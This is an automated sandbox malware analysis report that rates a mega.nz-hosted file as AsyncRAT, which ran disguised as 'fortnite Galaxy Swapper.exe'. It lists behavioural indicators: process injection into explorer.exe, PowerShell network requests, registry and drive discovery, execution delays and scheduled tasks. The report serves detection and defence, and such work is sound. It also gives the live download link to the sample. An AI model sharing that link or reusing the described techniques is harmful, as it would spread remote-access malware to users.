Malware Analysis Report

2025-04-13 12:35

Sample ID 240802-sv1l3svakd
Target https://mega.nz/file/CUt1QDyR#n6vgudTHTYgM_mZuot-SW_zmhiqVQXzqt_2RFi4uTMM
Tags
asyncrat default discovery execution rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://mega.nz/file/CUt1QDyR#n6vgudTHTYgM_mZuot-SW_zmhiqVQXzqt_2RFi4uTMM was found to be: Known bad.

Malicious Activity Summary

asyncrat default discovery execution rat

AsyncRat

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Enumerates connected drives

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Browser Information Discovery

NTFS ADS

Modifies data under HKEY_USERS

Enumerates system info in registry

Checks SCSI registry key(s)

Checks processor information in registry

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: AddClipboardFormatListener

Scheduled Task/Job: Scheduled Task

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-02 15:27

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-02 15:27

Reported

2024-08-02 15:41

Platform

win10v2004-20240802-es

Max time kernel

602s

Max time network

606s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/CUt1QDyR#n6vgudTHTYgM_mZuot-SW_zmhiqVQXzqt_2RFi4uTMM

Signatures

AsyncRat

rat asyncrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\D: C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk C:\Windows\System32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5140 set thread context of 5220 N/A C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\rnpkeys.exe C:\Windows\SysWOW64\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIEF44.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{EE732749-08BE-4A8A-B918-99E4E0373581} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIED6E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF168.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF198.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI21D7.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI21F7.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI24B8.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2197.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5aea61.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e5aea61.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFEC9.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFEE9.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2148.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF1E7.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI40B.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5aea65.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2236.tmp C:\Windows\system32\msiexec.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Server-Host.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\fortnite Galaxy Swapper - copia.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_CLASSES\7-ZIP.RAR\SHELL\OPEN\COMMAND C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.cab C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.lzma\shell\open\command C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.7z\shell\open C:\Program Files\7-Zip\7zFM.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.xz\DefaultIcon\ = "C:\\Program Files\\7-Zip\\7z.dll,23" C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.txz\DefaultIcon C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.lzma\shell\open C:\Program Files\7-Zip\7zFM.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.tar\shell C:\Program Files\7-Zip\7zFM.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.zip\ = "7-Zip.zip" C:\Program Files\7-Zip\7zFM.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.rar\shell\ C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.tar\shell\open C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.rar C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.cab C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.rar C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.iso C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.txz C:\Program Files\7-Zip\7zFM.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.rar\ = "rar Archive" C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.iso\shell\open C:\Program Files\7-Zip\7zFM.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.tar\shell\open\command\ = "\"C:\\Program Files\\7-Zip\\7zFM.exe\" \"%1\"" C:\Program Files\7-Zip\7zFM.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.zip\DefaultIcon C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.xz\shell\open C:\Program Files\7-Zip\7zFM.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.tar\shell\open C:\Program Files\7-Zip\7zFM.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.bz2\ = "7-Zip.bz2" C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.bz2\shell\open\command C:\Program Files\7-Zip\7zFM.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.rar\shell C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Pictures" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.7z\ = "7-Zip.7z" C:\Program Files\7-Zip\7zFM.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.7z\DefaultIcon\ = "C:\\Program Files\\7-Zip\\7z.dll,0" C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.zip\shell C:\Program Files\7-Zip\7zFM.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.lzma\ = "lzma Archive" C:\Program Files\7-Zip\7zFM.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.tar\shell\open\ C:\Program Files\7-Zip\7zFM.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.bz2\shell\ C:\Program Files\7-Zip\7zFM.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.7z\shell C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\.7z C:\Program Files\7-Zip\7zFM.exe N/A
Key created \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\7-Zip.rar\shell\open\command C:\Program Files\7-Zip\7zFM.exe N/A
